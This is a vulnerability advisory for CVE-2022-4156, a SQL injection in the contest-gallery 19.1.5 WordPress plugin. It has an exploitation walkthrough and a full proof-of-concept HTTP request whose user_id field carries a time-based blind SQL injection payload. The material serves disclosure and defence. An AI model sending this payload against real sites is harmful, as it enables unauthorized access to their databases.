contest-gallery 19.1.5 (1/15) WordPress plug-in SQL injection

Vulnerability Metadata


Key Value
Date of Disclosure December 05 2022
Affected Software contest-gallery
Affected Software Type WordPress plugin
Version 19.1.5
Weakness SQL Injection
CWE ID CWE-89
CVE ID CVE-2022-4156
CVSS 3.x Base Score n/a
CVSS 2.0 Base Score n/a
Reporter Kunal Sharma, Daniel Krohmer
Reporter Contact k_sharma19@informatik.uni-kl.de
Link to Affected Software https://wordpress.org/plugins/contest-gallery/
Link to Vulnerability DB https://nvd.nist.gov/vuln/detail/CVE-2022-4156

Vulnerability Description


The MULTIPART user_id POST query parameter in contest-gallery 19.1.5 is vulnerable to SQL Injection. An attacker with no privileges can abuse the Update Profile functionality in post_cg_backend_image_upload function inside ajax-functions-backend.php. This leads to a threat actor crafting a malicious POST request.

Exploitation Guide

Create a New Gallery, if no gallery was created before.

contest-gallery_1_step-1.png

Change the Gallery name.

contest-gallery_1_step-2.png


contest-gallery_1_step-3.png

Add User Registration and User Login .

contest-gallery_1_step-4.png

contest-gallery_1_step-5.png

These registration and login forms can be used by any external user to login and register as Contest Gallery User.

Add a New User either via User Registration form above or by Add User option on WordPress Dashboard. Note: Here we create user via Add User option on WordPress Dashboard, and assign Contest Gallery User role

contest-gallery_1_step-6.png

Login with the new user via wp-admin login or User Login on the page with user_login shortcode.

Click on Update Profile.

contest-gallery_1_step-7.png

Clicking Update Profile triggers the update request, copy Cookie,_wpnonce, and email value.

contest-gallery_1_step-8.png

Replace the copied values in the Exploit Payload.

contest-gallery_1_step-10.png


contest-gallery_1_step-9.png

Sending the request with POC triggers the vulnerable request. The MULTIPART user_id is the vulnerable parameter.

contest-gallery_1_step-11.png

In the application code, the vulnerability is triggered by un-sanitized user input of user_id at line 67 in ./ajax/ajax-functions-backend.php.

contest-gallery_1_step-12.png

At line 80 in ./ajax/ajax-functions-backend.php the database query call on $WpUserId leads to SQL Injection.

contest-gallery_1_step-13.png

Exploit Payload


Please note that cookies and nonces need to be changed according to your user settings, otherwise the exploit will not work.

The SQL injection can be triggered by sending the request below:

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:106.0) Gecko/20100101 Firefox/106.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://localhost:8080/wp-admin/profile.php
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------5167035403431582548369588705
Content-Length: 2816
Origin: http://localhost:8080
Connection: close
Cookie: wordpress_37d007a56d816107ce5b52c10342db37=test1%7C1668471291%7C7VPhYIeBdCjIP9uW8VoyQrGPufCvPRRf5M9OXWus6HS%7C92b6fd388ba13304a4e6d05bb993994b73e939c69f835a5f48832fd667db6a41; wp-settings-time-2=1667954049; wordpress_test_cookie=WP%20Cookie%20check; wp_lang=en_US; wordpress_logged_in_37d007a56d816107ce5b52c10342db37=test1%7C1668471291%7C7VPhYIeBdCjIP9uW8VoyQrGPufCvPRRf5M9OXWus6HS%7C4a47ea962cf6ef424f4c85c035f566bcefb106dac5c9061bff96ab380af53d60; wp-settings-time-3=1668298491
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------5167035403431582548369588705
Content-Disposition: form-data; name="_wpnonce"

5c8402bea9
-----------------------------5167035403431582548369588705
Content-Disposition: form-data; name="cg_input_image_upload_file_to_delete_wp_id"

1
-----------------------------5167035403431582548369588705
Content-Disposition: form-data; name="_wp_http_referer"

/wp-admin/profile.php
-----------------------------5167035403431582548369588705
Content-Disposition: form-data; name="from"

profile
-----------------------------5167035403431582548369588705
Content-Disposition: form-data; name="checkuser_id"

3
-----------------------------5167035403431582548369588705
Content-Disposition: form-data; name="color-nonce"

6f0655e068
-----------------------------5167035403431582548369588705
Content-Disposition: form-data; name="admin_color"

fresh
-----------------------------5167035403431582548369588705
Content-Disposition: form-data; name="admin_bar_front"

1
-----------------------------5167035403431582548369588705
Content-Disposition: form-data; name="first_name"


-----------------------------5167035403431582548369588705
Content-Disposition: form-data; name="last_name"


-----------------------------5167035403431582548369588705
Content-Disposition: form-data; name="nickname"

test1
-----------------------------5167035403431582548369588705
Content-Disposition: form-data; name="display_name"

test1
-----------------------------5167035403431582548369588705
Content-Disposition: form-data; name="email"

test1@c.com
-----------------------------5167035403431582548369588705
Content-Disposition: form-data; name="url"


-----------------------------5167035403431582548369588705
Content-Disposition: form-data; name="description"


-----------------------------5167035403431582548369588705
Content-Disposition: form-data; name="pass1"


-----------------------------5167035403431582548369588705
Content-Disposition: form-data; name="pass2"


-----------------------------5167035403431582548369588705
Content-Disposition: form-data; name="cg_user_data_available"

true
-----------------------------5167035403431582548369588705
Content-Disposition: form-data; name="cg_user_id"

3
-----------------------------5167035403431582548369588705
Content-Disposition: form-data; name="action"

post_cg_backend_image_upload
-----------------------------5167035403431582548369588705
Content-Disposition: form-data; name="cg_input_image_upload_file[]"; filename="index.png"
Content-Type: text/plain

TEST
-----------------------------5167035403431582548369588705
Content-Disposition: form-data; name="user_id"

3 AND (SELECT 6037 FROM (SELECT(SLEEP(5)))Uiuu)
-----------------------------5167035403431582548369588705--